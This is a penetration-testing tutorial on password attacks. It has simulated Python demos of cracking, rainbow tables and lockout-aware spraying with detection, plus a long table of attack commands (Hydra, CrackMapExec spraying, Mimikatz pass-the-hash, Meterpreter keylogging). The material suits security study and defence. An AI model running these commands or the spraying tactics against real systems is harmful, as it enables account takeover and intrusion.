# Password Attacks

***

#### 1. **Introduction to Password Attacks**

Password attacks aim to obtain valid credentials by exploiting weaknesses in how passwords are chosen, stored, or transmitted. They succeed most often against weak or reused passwords, fast or unsalted hashing, services without rate limiting or lockout, and hosts that leak credential material (cached hashes, tokens, cleartext protocols). A useful split is **online** attacks, which send guesses to a live service and are bounded by network latency and lockout policy, and **offline** attacks, which run against captured hashes and are bounded only by hash speed and hardware.

#### 2. **Common Types of Password Attacks**

**a. Brute Force Attack**

* **Description**: Tries every combination of a character set up to a given length. It always succeeds eventually, but the keyspace grows as `charset_size ^ length`, so each extra character multiplies the cost.
* **Tools**: Hydra (online, `-x`), John the Ripper (incremental mode), Hashcat (mask attack, `-a 3`).
* **Pros & Cons**: Complete and needs no wordlist, but impractical beyond roughly eight characters offline and almost never viable online, where lockouts and round-trip time cap the rate at a few guesses per second.
* **Command Example** (Hydra generates candidates of 4 to 6 characters from lowercase, uppercase and digits; `-P wordlist` in place of `-x` would make this a dictionary attack instead):

  ```bash
  hydra -l user -x 4:6:aA1 <target_IP> ssh
  ```

**b. Dictionary Attack**

* **Description**: Tries each entry of a wordlist, optionally mangled by rules (case toggles, leet substitutions, appended years) to multiply the coverage of a small list.
* **Tools**: Hashcat, Medusa, John the Ripper.
* **Pros & Cons**: Orders of magnitude cheaper than brute force and recovers most human-chosen passwords, but limited by the quality and relevance of the list; a list built from breach data and the target's own vocabulary (company name, products, local sports teams) outperforms a generic one.
* **Resources for Wordlists**:
  * [SecLists on GitHub](https://github.com/danielmiessler/SecLists)
  * [Weakpass](https://weakpass.com/)

**c. Hybrid Attack**

* **Description**: Combines each dictionary word with a mask of character variations, such as appended digits or symbols, to catch patterns like `Summer2024!`.
* **Tools**: Hashcat (`-a 6` appends the mask, `-a 7` prepends it), John the Ripper (wordlist mode with rules).
* **Pros & Cons**: Efficiently targets passwords that follow predictable patterns; the cost is the wordlist size multiplied by the mask keyspace, so masks should stay short.
* **Command Example** (every wordlist entry followed by four digits):

  ```bash
  hashcat -a 6 -m <hash_type> <hash_file> /path/to/wordlist.txt ?d?d?d?d
  ```
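
The three modes above differ mainly in how many candidates they hash before they succeed. The following added example (not from the original page or from any of the tools named above) runs them in the order a practitioner would, cheapest first, against three constructed unsalted SHA-1 hashes and counts the candidates each mode had to hash. The wordlist, the target passwords and the small brute-force charset are all made up for the demonstration.

```python
import hashlib
import itertools
import string

# Constructed targets: unsalted SHA-1 of three passwords an assumed user chose.
# Nothing here comes from a real breach.
TARGET_PLAINTEXTS = ["letmein", "winter2024", "ab1!"]
TARGETS = {hashlib.sha1(p.encode()).hexdigest() for p in TARGET_PLAINTEXTS}

WORDLIST = ["password", "letmein", "winter", "summer", "qwerty"]   # constructed, tiny
BRUTE_CHARSET = string.ascii_lowercase + string.digits + "!"       # 37 symbols
BRUTE_MAX_LEN = 4


def dictionary_candidates(words):
    """Hashcat -a 0: try each wordlist entry as-is."""
    yield from words


def hybrid_candidates(words, digits=4):
    """Hashcat -a 6 (wordlist + mask): every word followed by every ?d?d?d?d suffix."""
    for w in words:
        for suffix in itertools.product(string.digits, repeat=digits):
            yield w + "".join(suffix)


def brute_force_candidates(charset, max_len):
    """Hashcat -a 3 with a full mask: the whole keyspace, shortest candidates first."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def crack(candidates, targets):
    """Hash each candidate, compare against the remaining targets, stop when all are found.
    Returns ({hash: plaintext}, number_of_candidates_hashed)."""
    remaining = set(targets)
    found, tried = {}, 0
    for cand in candidates:
        if not remaining:
            break
        tried += 1
        h = hashlib.sha1(cand.encode()).hexdigest()
        if h in remaining:
            found[h] = cand
            remaining.remove(h)
    return found, tried


def keyspace(charset, max_len):
    """Candidates a full brute force would have to hash in the worst case."""
    return sum(len(charset) ** n for n in range(1, max_len + 1))


def run_pipeline(targets):
    """Cheapest mode first; each mode only works on hashes the earlier modes missed."""
    modes = [
        ("dictionary", lambda: dictionary_candidates(WORDLIST)),
        ("hybrid", lambda: hybrid_candidates(WORDLIST)),
        ("brute_force", lambda: brute_force_candidates(BRUTE_CHARSET, BRUTE_MAX_LEN)),
    ]
    cracked, stats, remaining = {}, {}, set(targets)
    for name, gen in modes:
        if not remaining:
            break
        found, tried = crack(gen(), remaining)
        cracked.update(found)
        remaining -= set(found)
        stats[name] = tried
    return cracked, stats


if __name__ == "__main__":
    cracked, stats = run_pipeline(TARGETS)
    for mode, tried in stats.items():
        print(f"{mode:12s} hashed {tried:>7d} candidates")
    print("recovered:", sorted(cracked.values()))
    print("full brute-force keyspace for len<=4:", keyspace(BRUTE_CHARSET, BRUTE_MAX_LEN))
```

The dictionary pass costs five hashes, the hybrid pass fifty thousand, and the brute-force pass stops only because `ab1!` happens to sit early in a 1.9-million-candidate keyspace; with a realistic charset and an eight-character password the last mode is the one that never finishes.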

**d. Rainbow Table Attack**

* **Description**: Uses precomputed hash chains to trade storage for lookup time: the hashing is done once up front, and each target hash is then recovered by walking a few chains instead of rehashing the whole keyspace.
* **Tools**: RainbowCrack, Ophcrack.
* **Pros & Cons**: Very fast once a table for the exact algorithm exists, but tables are large (gigabytes to terabytes) and only work on **unsalted** hashes such as LM, NTLM, raw MD5 or SHA-1. A per-user salt would require a separate table per salt value, which defeats precomputation entirely; bcrypt, scrypt, Argon2 and PBKDF2 are all salted by design.
* **Rainbow Table Resources**:
  * [Project RainbowCrack](http://project-rainbowcrack.com/)
  * [CrackStation](https://crackstation.net/) (online lookup of unsalted hashes)
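
Added example, not from the original page or from RainbowCrack: a miniature rainbow table over the 10,000 four-digit PIN space with an unsalted SHA-256 hash, built the way a real table is (only chain endpoints are stored; intermediate values are recomputed on lookup) and then queried with an unsalted and a salted hash of the same PIN. The chain length, chain count and reduction function are arbitrary choices for the demonstration.

```python
import hashlib

CHARSET = "0123456789"
PW_LEN = 4
SPACE = len(CHARSET) ** PW_LEN          # 10,000 possible 4-digit PINs
CHAIN_LEN = 40
NUM_CHAINS = 500


def H(pw):
    """The unsalted, fast hash the table is built for (SHA-256 here; LM/NTLM/MD5 in practice)."""
    return hashlib.sha256(pw.encode()).hexdigest()


def reduce_to_password(h, col):
    """Map a hash back into the password space. Mixing in the column index is what makes the
    table 'rainbow': a different reduction per column keeps merged chains from staying merged."""
    n = (int(h[:16], 16) + col) % SPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def build_table(num_chains=NUM_CHAINS, chain_len=CHAIN_LEN):
    """Store only endpoint -> starting points; every intermediate value is recomputed on lookup.
    Returns the table and the set of passwords the chains actually cover."""
    table, covered = {}, set()
    for i in range(num_chains):
        start = x = f"{(i * 7919) % SPACE:0{PW_LEN}d}"   # spread-out deterministic start points
        for col in range(chain_len):
            covered.add(x)
            x = reduce_to_password(H(x), col)
        table.setdefault(x, []).append(start)
    return table, covered


def lookup(table, target_hash, chain_len=CHAIN_LEN):
    """Recover the password for target_hash if some chain passes through it, else None."""
    for i in range(chain_len - 1, -1, -1):
        # Assume the target sits at column i and walk the chain to its endpoint.
        y = reduce_to_password(target_hash, i)
        for col in range(i + 1, chain_len):
            y = reduce_to_password(H(y), col)
        for start in table.get(y, ()):
            x = start                         # regenerate that chain and look for the hash
            for col in range(chain_len):
                if H(x) == target_hash:
                    return x
                x = reduce_to_password(H(x), col)
    return None


def salted(pw, salt):
    """What a sane password store does instead: the table was not built for this hash."""
    return hashlib.sha256(salt + pw.encode()).hexdigest()


if __name__ == "__main__":
    table, covered = build_table()
    print(f"{len(table)} endpoints stored, {len(covered)}/{SPACE} passwords covered")
    pin = sorted(covered)[0]
    print("unsalted lookup:", lookup(table, H(pin)))
    print("salted lookup:  ", lookup(table, salted(pin, b"\x5a" * 16)))
```

The table holds 500 endpoints instead of 10,000 hashes, and a lookup costs at most a few thousand hash operations rather than a full sweep. Against the salted hash the same lookup returns nothing: every distinct salt would need its own table, so for a 16-byte random salt the storage requirement is multiplied by 2^128.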

**e. Credential Stuffing**

* **Description**: Replays username-password pairs from one breach against other services, betting on password reuse. Unlike brute force it makes one or two guesses per account, so lockouts rarely trigger.
* **Tools**: Sentry MBA, Snipr, OpenBullet (all driven by per-site "configs" that script the login flow).
* **Pros & Cons**: Highly effective against users who reuse passwords and cheap to run at scale, but it depends on breached data and is blunted by MFA, breached-password screening, and per-IP or per-device rate limiting.
* **Breach Data Resources**:
  * [Have I Been Pwned](https://haveibeenpwned.com/) (breach lookup and the Pwned Passwords API for screening)
  * [Dehashed](https://www.dehashed.com/)

**f. Password Spraying**

* **Description**: Tries one or two common passwords (`Summer2024!`, `Welcome1`) against many accounts, then waits out the lockout observation window before the next round, so no single account accumulates enough failures to lock.
* **Tools**: CrackMapExec/NetExec (SMB, LDAP, WinRM), Ruler (Exchange/OWA), SprayingToolkit (OWA, Lync, ADFS), Kerbrute (Kerberos pre-auth).
* **Pros & Cons**: Effective against organizations with weak password policies or no MFA, and much quieter per account than brute force, but the pattern is distinctive: many accounts, one source, few failures each (Windows 4625 or Kerberos 4771 events spread across users) is exactly what spray detections look for. Enumerate the lockout policy first (`net accounts /domain`, or the `lockoutThreshold` and `lockoutObservationWindow` attributes on the domain object) and stay at threshold minus one.
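
Added example, not part of the original page or of any spraying tool: a simulated directory with an AD-style lockout policy (threshold 5, 30-minute observation window; constructed accounts and passwords), a spray routine that paces itself at threshold minus one rounds per window, a single-account brute force for contrast, and a detector that flags a source whose failures spread across many accounts inside one window. All addresses, users and passwords are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed directory and an AD-style lockout policy (assumed values).
USERS = {"alice": "Spring2024!", "bob": "Winter2023!", "carol": "P@ssw0rd", "dave": "hunter2"}
THRESHOLD = 5                    # bad attempts within the window that lock the account
WINDOW = timedelta(minutes=30)   # lockout observation window
# Constructed spray list: seasonal and onboarding passwords most policies still allow.
SPRAY_LIST = ["Password1", "Welcome1", "Spring2024!", "Summer2024!", "Autumn2024!", "Winter2023!"]


class Directory:
    """Minimal authentication backend with a Windows-style bad-password counter."""

    def __init__(self, users, threshold, window):
        self.users, self.threshold, self.window = users, threshold, window
        self.failures = defaultdict(list)   # user -> timestamps of failures still in the window
        self.locked = set()
        self.log = []                       # (time, src_ip, user, outcome), like 4625/4771 events

    def authenticate(self, user, password, now, src_ip):
        if user in self.locked:
            outcome = "locked"
        elif self.users.get(user) == password:
            outcome = "success"
            self.failures[user].clear()      # a success resets the bad-password count
        else:
            recent = [t for t in self.failures[user] if now - t < self.window] + [now]
            self.failures[user] = recent
            outcome = "failure"
            if len(recent) >= self.threshold:
                self.locked.add(user)
                outcome = "locked"
        self.log.append((now, src_ip, user, outcome))
        return outcome


def spray(directory, usernames, passwords, start, src_ip="203.0.113.7"):
    """One password against every account per round; after threshold-1 rounds, wait out the
    observation window so no account ever reaches the lockout threshold."""
    rounds_per_window = directory.threshold - 1
    now, hits = start, {}
    for i, password in enumerate(passwords):
        if i and i % rounds_per_window == 0:
            now += directory.window + timedelta(minutes=1)
        for user in usernames:
            if user not in hits and directory.authenticate(user, password, now, src_ip) == "success":
                hits[user] = password
        now += timedelta(seconds=len(usernames))   # rough pacing between rounds
    return hits


def brute_force_one_account(directory, user, passwords, start, src_ip="203.0.113.7"):
    """The naive alternative: every password against one account at once."""
    for password in passwords:
        outcome = directory.authenticate(user, password, start, src_ip)
        if outcome in ("success", "locked"):
            return outcome
    return "failure"


def detect_spray(log, window, min_accounts=3):
    """Flag sources whose failures touch at least `min_accounts` distinct accounts inside one
    window: the many-accounts, one-source, few-failures-each signature of spraying."""
    by_src = defaultdict(list)
    for t, src, user, outcome in log:
        if outcome != "success":
            by_src[src].append((t, user))
    flagged = set()
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            accounts = {u for t, u in events[i:] if t - t0 < window}
            if len(accounts) >= min_accounts:
                flagged.add(src)
                break
    return flagged


def run_demo(start=datetime(2024, 3, 1, 9, 0)):
    d = Directory(USERS, THRESHOLD, WINDOW)
    # A legitimate user mistyping twice from the office: must not be flagged.
    d.authenticate("alice", "Sprng2024!", start, "198.51.100.5")
    d.authenticate("alice", "Spring2024", start + timedelta(seconds=20), "198.51.100.5")
    hits = spray(d, list(USERS), SPRAY_LIST, start + timedelta(minutes=1))
    # Contrast on a fresh directory: hammering one account with the same six passwords.
    naive = brute_force_one_account(Directory(USERS, THRESHOLD, WINDOW), "dave", SPRAY_LIST, start)
    return hits, set(d.locked), naive, detect_spray(d.log, WINDOW)


if __name__ == "__main__":
    hits, locked, naive, flagged = run_demo()
    print("spray hits:", hits, "| accounts locked by spray:", locked or "none")
    print("single-account brute force outcome:", naive)
    print("sources flagged by spray detection:", flagged)
```

Note that alice's two genuine typos count toward her lockout total: the spray's third round lands on her fourth failure, one short of the threshold. A real spray has no way to know how many failures an account already carries, which is why careful operators leave more headroom than threshold minus one and check `badPwdCount` first when they can.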

***

#### 3. **Popular Password Hacking Tools**

**a. John the Ripper**

* **Description**: One of the most widely used open-source password crackers; the community "jumbo" build adds hundreds of hash and file formats (archives, documents, private keys).
* **Capabilities**: Single-crack, wordlist, incremental (brute-force) and mask modes, a rich rule language for word mangling, and helper tools (`zip2john`, `ssh2john`, `rar2john`, ...) that turn protected files into crackable hashes.
* **Resources**: [John the Ripper Documentation](https://www.openwall.com/john/doc/)

**b. Hashcat**

* **Description**: A high-performance password cracker optimized for GPUs.
* **Capabilities**: Attack modes for straight wordlist (`-a 0`), combinator (`-a 1`), mask (`-a 3`) and hybrid (`-a 6`/`-a 7`) attacks, rule files, and several hundred hash types selected with `-m`; it also reports speed per device, so the feasibility of a keyspace can be estimated before committing to it.
* **Resources**: [Hashcat Wiki](https://hashcat.net/wiki/)

**c. Hydra**

* **Description**: A fast, parallelized online login cracker for dozens of network protocols (SSH, FTP, HTTP forms, SMB, RDP, databases and more).
* **Capabilities**: Wordlist and generated (`-x`) guessing across many protocols, with tunable parallelism (`-t`) to stay under a service's lockout or rate limit.
* **Resources**: [Hydra GitHub Repository](https://github.com/vanhauser-thc/thc-hydra)

**d. Medusa**

* **Description**: A modular, parallel online brute-forcer comparable to Hydra.
* **Capabilities**: Thread-based parallelism across hosts, users and passwords; modules for SSH, FTP, HTTP, SMB, MS-SQL, MySQL, PostgreSQL, VNC, SNMP and others (`medusa -d` lists them).
* **Resources**: [Medusa Documentation](https://github.com/jmk-foofus/medusa)

**e. CrackMapExec**

* **Description**: A Swiss Army knife for Active Directory assessments that handles password spraying, credential validation, hash and credential dumping, and command execution over SMB, LDAP, WinRM, MSSQL and SSH.
* **Capabilities**: Built on Impacket rather than Metasploit; accepts NTLM hashes (`-H`) as well as passwords, and `--continue-on-success` keeps a spray running after the first hit. The original project is no longer maintained; its actively developed successor is NetExec (`nxc`), which keeps the same syntax.
* **Resources**: [CrackMapExec GitHub](https://github.com/byt3bl33d3r/CrackMapExec), [NetExec GitHub](https://github.com/Pennyw0rth/NetExec)

**f. Ophcrack**

* **Description**: Uses rainbow tables to crack Windows LM and NTLM hashes.
* **Capabilities**: Specialized in Windows passwords; the free tables cover LM and short alphanumeric NT hashes. Modern Windows no longer stores LM hashes by default, so Ophcrack is mostly useful against legacy SAM dumps.
* **Resources**: [Ophcrack Official Site](https://ophcrack.sourceforge.io/)

***

#### 4. **Specialized Password Attack Techniques**

**a. Man-in-the-Middle (MitM) Attacks**

* **Description**: Intercepts credentials in transit. Cleartext protocols (HTTP, FTP, Telnet, POP3) give up the password directly; challenge-response protocols such as NTLM yield a NetNTLMv1/v2 response that is cracked offline (Hashcat `-m 5500`/`-m 5600`) or relayed. TLS and SMB signing limit both.
* **Tools**: Ettercap, Bettercap, Responder (MITMf is no longer maintained).
* **Resources**: [Bettercap Documentation](https://bettercap.org/)

**b. Pass-the-Hash**

* **Description**: Authenticates with a stolen NT hash instead of the password. NTLM challenge-response only ever uses the hash, so cracking is unnecessary: the hash is injected into a logon session and every SMB, WMI or RPC connection from it authenticates as the victim. The Kerberos equivalent, requesting a TGT from the NT hash, is called overpass-the-hash. Dumping the hash in the first place requires local administrator or SYSTEM on the host.
* **Tools**: Mimikatz (`sekurlsa::pth`), Impacket (`-hashes` option on `psexec.py`, `wmiexec.py`, `secretsdump.py`), the original Pass-the-Hash Toolkit.
* **Resources**: [Mimikatz GitHub](https://github.com/gentilkiwi/mimikatz)

**c. Keylogging and Malware**

* **Description**: Captures keystrokes to retrieve passwords directly from user input, bypassing hashing and transport protection entirely.
* **Tools**: Metasploit (Meterpreter `keyscan_start`/`keyscan_dump`), Cobalt Strike.
* **Pros & Cons**: Recovers the cleartext and any MFA code typed, but requires code execution on the victim host first and is exposed to endpoint detection.

**d. Phishing and Social Engineering**

* **Description**: Tricks users into revealing their passwords through cloned login pages or deceptive requests; a credential harvested this way needs no cracking.
* **Tools**: Gophish (campaign management and tracking), SET (Social-Engineer Toolkit, site cloner and credential harvester).
* **Resources**: [Gophish GitHub](https://github.com/gophish/gophish)

***

#### 5. **Hash Cracking Techniques and Tools**

**a. NTLM and LM Hash Cracking**

* **Background**: LM hashes upper-case the password, split it into two 7-character halves and DES-encrypt a constant with each, so they fall in minutes. NT hashes are an unsalted MD4 of the UTF-16LE password, which GPUs compute at tens of billions per second. Neither is salted, so identical passwords give identical hashes and rainbow tables apply.
* **Tools**: Hashcat (`-m 3000` for LM, `-m 1000` for NT), John the Ripper (`--format=LM`, `--format=NT`), Ophcrack; Cain and Abel is unmaintained.
* **Command Example**:

  ```bash
  john --format=NT hashfile
  ```

**b. SHA-1 and SHA-256 Cracking**

* **Tools**: Hashcat (`-m 100` for SHA-1, `-m 1400` for SHA-256; salted variants have their own modes), John the Ripper (`--format=raw-sha1`, `--format=raw-sha256`).
* **Command Example** (straight wordlist attack, `-a 0`, against raw SHA-1 hashes):

  ```bash
  hashcat -a 0 -m 100 hashfile /path/to/wordlist.txt
  ```

**c. PBKDF2 and bcrypt Cracking**

* **Tools**: Hashcat (`-m 3200` bcrypt, `-m 10900` PBKDF2-HMAC-SHA256, `-m 12000` PBKDF2-HMAC-SHA1, `-m 12100` PBKDF2-HMAC-SHA512), JtR.
* **Caveat**: These are deliberately slow, salted constructions. bcrypt's cost factor and PBKDF2's iteration count cut cracker throughput by thousands to millions of times compared with raw SHA-1, so brute force and long masks are off the table; realistic attacks use short, targeted wordlists with rules and accept a low recovery rate.
* **Resources**: [Hashcat Hash Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
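
To make the cost concrete, the following added example (not from the original page, hashcat or John) cracks one PBKDF2-HMAC-SHA1 record with a small constructed wordlist, converts the record into the `sha1:iterations:salt:hash` line that hashcat's mode 12000 expects, and measures how much slower each candidate is than a raw SHA-1. The record uses the RFC 6070 test vector (password `password`, salt `salt`, 4096 iterations) so the output can be checked independently; the wordlist and the keyspace figures are made up.

```python
import base64
import hashlib
import hmac
import time

# Constructed stored record: PBKDF2-HMAC-SHA1, 4096 iterations, salt "salt", 20-byte key.
# The values are the RFC 6070 test vector, so they can be checked independently.
ITERATIONS = 4096
SALT = b"salt"
STORED_HEX = "4b007901b765489abead49d926f721d065a429c1"
WORDLIST = ["123456", "qwerty", "letmein", "password", "dragon"]   # constructed


def derive(password, salt, iterations, dklen=20):
    """One PBKDF2-HMAC-SHA1 derivation, i.e. `iterations` chained HMAC computations."""
    return hashlib.pbkdf2_hmac("sha1", password.encode(), salt, iterations, dklen)


def crack_pbkdf2(stored_hex, salt, iterations, wordlist):
    """Dictionary attack against one record. Returns (password or None, candidates tried).
    Every candidate costs `iterations` HMACs, which is the whole point of the KDF."""
    target = bytes.fromhex(stored_hex)
    for tried, cand in enumerate(wordlist, 1):
        if hmac.compare_digest(derive(cand, salt, iterations, len(target)), target):
            return cand, tried
    return None, len(wordlist)


def to_hashcat_12000(iterations, salt, dk):
    """Format a record the way hashcat -m 12000 (PBKDF2-HMAC-SHA1) expects it:
    sha1:<iterations>:<base64 salt>:<base64 derived key>."""
    return f"sha1:{iterations}:{base64.b64encode(salt).decode()}:{base64.b64encode(dk).decode()}"


def hashes_per_second(fn, seconds=0.2):
    """Rough single-core throughput of a hash function on this machine."""
    n, end = 0, time.perf_counter() + seconds
    while time.perf_counter() < end:
        fn()
        n += 1
    return n / seconds


def expected_seconds(keyspace, rate):
    """Worst-case time to exhaust a keyspace at `rate` candidates per second."""
    return keyspace / rate


if __name__ == "__main__":
    pw, tried = crack_pbkdf2(STORED_HEX, SALT, ITERATIONS, WORDLIST)
    print(f"recovered {pw!r} after {tried} candidates")
    print("hashcat line:", to_hashcat_12000(ITERATIONS, SALT, bytes.fromhex(STORED_HEX)))
    fast = hashes_per_second(lambda: hashlib.sha1(b"password").digest())
    slow = hashes_per_second(lambda: derive("password", SALT, ITERATIONS))
    print(f"raw SHA-1: {fast:,.0f}/s   PBKDF2x{ITERATIONS}: {slow:,.0f}/s   slowdown x{fast / slow:,.0f}")
    space = 26 ** 8     # eight lowercase letters, a deliberately small keyspace
    print(f"8 lowercase letters: {expected_seconds(space, fast) / 3600:,.1f} h raw vs "
          f"{expected_seconds(space, slow) / 86400 / 365:,.1f} years at 4096 iterations")
```

The slowdown factor printed at the end is the number a defender tunes: raising the iteration count or bcrypt cost multiplies an attacker's bill directly, while the legitimate login still pays it only once per authentication.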

***

#### 6. **Guides and Resources for Further Learning**

* **Defensive Counterpart**: [OWASP Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html) (lockout, rate limiting and password policy guidance)
* **Understanding Hash Functions**: [NIST FIPS 180-4, Secure Hash Standard](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf)
* **Hashcat Project Page**: [hashcat.net](https://hashcat.net/hashcat/) (downloads, benchmarks and attack-mode documentation)

***

#### Conclusion

This overview of password attacks illustrates the variety of tools and techniques available to an attacker; the defensive counterpart to each is predictable: slow, salted hashing against offline cracking, lockout and rate limiting against online guessing, and MFA plus breached-password screening against stuffing and spraying. In practice, penetration testers should select methods based on target context (online or offline, lockout policy, hash type) and on the evidence each method leaves behind. Tools and formats change quickly, so this material should be revisited regularly.

Below is a comprehensive table of common password attack vectors, primary tools used for each, and example usages. This will provide an extensive reference list for various attack techniques, covering both standard and specialized tools.

| **Attack Vector**                 | **Primary Tool**              | **Example Usage**                                                                |
| --------------------------------- | ----------------------------- | -------------------------------------------------------------------------------- |
| Brute Force                       | Hydra                         | `hydra -l user -x 4:6:aA1 <target_IP> ssh`                                       |
| Dictionary Attack                 | John the Ripper               | `john --wordlist=/path/to/wordlist.txt hashfile`                                 |
| Hybrid Attack                     | Hashcat                       | `hashcat -a 6 -m 1000 hashfile /path/to/wordlist.txt`                            |
| Rainbow Table Attack              | Ophcrack                      | `ophcrack -g -d <tables_dir> -t <table_name> -f hashfile` (unsalted LM/NT only)  |
| Credential Stuffing               | Snipr                         | Uses breach lists for multi-account testing                                      |
| Password Spraying                 | CrackMapExec                  | `crackmapexec smb <target_IP> -u users.txt -p 'Summer2024!' --continue-on-success` (one password per round; a full password file here is brute force and will lock accounts) |
| Keylogging Attack                 | Metasploit                    | `meterpreter > keyscan_start`                                                    |
| Phishing                          | Gophish                       | Set up phishing campaign targeting email credentials                             |
| Pass-the-Hash                     | Mimikatz                      | `sekurlsa::pth /user:Admin /domain:domain /ntlm:<NTLM_HASH> /run:powershell.exe` |
| Hash Cracking (NTLM)              | Hashcat                       | `hashcat -m 1000 hashfile /path/to/wordlist.txt`                                 |
| Hash Cracking (bcrypt)            | John the Ripper               | `john --format=bcrypt hashfile`                                                  |
| LM Hash Cracking                  | Cain and Abel                 | Load hashes and run automated cracking                                           |
| SSH Brute Force                   | Hydra                         | `hydra -l root -P passwords.txt ssh://<target_IP>`                               |
| HTTP Basic Auth Brute Force       | Medusa                        | `medusa -h <target_IP> -U users.txt -P passwords.txt -M http`                    |
| FTP Brute Force                   | Hydra                         | `hydra -L users.txt -P passwords.txt ftp://<target_IP>`                          |
| SMB Password Attack               | CrackMapExec                  | `crackmapexec smb <target_IP> -u admin -p passwords.txt`                         |
| SQL Database Password Hashes      | SQLMap                        | `sqlmap -u <URL> --passwords` (dumps DBMS user hashes and offers its built-in dictionary attack) |
| WPA2 Wi-Fi Cracking               | aircrack-ng                   | `aircrack-ng -w /path/to/wordlist.txt <capture-file>`                            |
| Email Phishing with Spoofed Links | SET (Social-Engineer Toolkit) | Phishing module setup targeting email collection                                 |
| Reverse Brute Force               | Hydra                         | `hydra -L usernames.txt -p commonpassword <target_IP> ssh`                       |
| Multi-Protocol Password Testing   | Medusa                        | Supports SMB, HTTP, FTP, Telnet, etc.                                            |
| Telnet Brute Force                | Hydra                         | `hydra -l root -P passwords.txt telnet://<target_IP>`                            |
| RDP Brute Force                   | Hydra                         | `hydra -l Administrator -P passwords.txt rdp://<target_IP>`                      |
| Cisco Router Telnet Brute Force   | Ncrack                        | `ncrack -p 23 --user root -P passwords.txt <target_IP>`                          |
| DNS Zone Transfer Attempt (recon, not a password attack) | dig        | `dig axfr <target_domain> @<nameserver>`                                         |
| LDAP Password Attack              | Hydra                         | `hydra -l "<bind_DN>" -P passwords.txt ldap3://<target_IP>`                      |
| Telnet Credential Guessing        | Hydra                         | `hydra -l admin -P passwords.txt telnet://<target_IP>`                           |
| SNMP Community String Brute Force | Onesixtyone                   | `onesixtyone -c community-strings.txt <target_IP>`                               |
| IPsec/IKE VPN PSK Cracking        | ike-scan + psk-crack          | `ike-scan -A -M --pskcrack=psk.txt <target_IP>` then `psk-crack -d passwords.txt psk.txt` (aggressive mode leaks a crackable PSK hash; Hydra has no OpenVPN module) |
| Apache Tomcat Manager Brute Force | Hydra                         | `hydra -l admin -P passwords.txt http-get://<target_IP>:8080/manager/html`       |
| XMPP Brute Force                  | Hydra                         | `hydra -l user -P passwords.txt xmpp://<target_IP>`                              |
| SIP/VoIP Credential Guessing      | SIPVicious                    | `svcrack -u <extension> -d passwords.txt <target_IP>` (svmap only discovers servers) |
| Oracle DB Password Attack         | ODAT                          | `odat passwordguesser -s <target_IP> -d <SID> --accounts-file accounts.txt`      |
| MSSQL Password Cracking           | Hydra                         | `hydra -l sa -P passwords.txt mssql://<target_IP>`                               |
| Kerberos Pre-Auth Brute Force     | Kerbrute                      | `kerbrute bruteuser -d domain.com --dc <DC_IP> passwords.txt <username>` (`passwordspray` for one password across users.txt) |
| RADIUS/EAP (MSCHAPv2) Cracking    | Hashcat                       | `hashcat -m 5500 captured_challenge.txt /path/to/wordlist.txt` (challenge/response captured by a rogue EAP server; Hydra and Medusa have no RADIUS module) |
| MongoDB Password Attack           | Hydra                         | `hydra -l user -P passwords.txt mongodb://<target_IP>`                           |
| Redis Password Brute Force        | Nmap                          | `nmap -p 6379 --script redis-brute <target_IP>` (`redis-info` shows whether auth is required at all) |
| MacOS Keychain Exploit            | Metasploit                    | Post-exploitation module in meterpreter for keychain access                      |
| VNC Password Brute Force          | Hydra                         | `hydra -P passwords.txt vnc://<target_IP>`                                       |
| VoIP/SIP Password Cracking        | Hydra                         | `hydra -L users.txt -P passwords.txt sip://<target_IP>`                          |
| Bitcoin Wallet Brute Force        | btcrecover                    | Uses known wallet details to attempt password recovery                           |
| Azure AD Password Spraying        | MSOLSpray                     | `python3 MSOLSpray.py -u users.txt -p Password123`                               |
| Office365 Credential Testing      | AADInternals                  | Uses PowerShell to enumerate and test credentials                                |
| ZIP File Password Cracking        | fcrackzip                     | `fcrackzip -u -D -p /path/to/wordlist.txt <file.zip>`                            |
| PDF Password Cracking             | pdfcrack                      | `pdfcrack -f <file.pdf> -w /path/to/wordlist.txt`                                |
| RAR File Password Cracking        | RarCrack                      | `rarcrack <file.rar> --type rar --threads 4` (pure brute force; no dictionary mode) |
| Network Share Password Cracking   | CrackMapExec                  | `crackmapexec smb <target_IP> -u usernames.txt -p passwords.txt`                 |

***

This table gives an overview of the attack vectors, tools, and sample commands. Each tool has its own options and quirks, so consult its documentation and adapt the commands to the target environment and its lockout policy before running them.

***
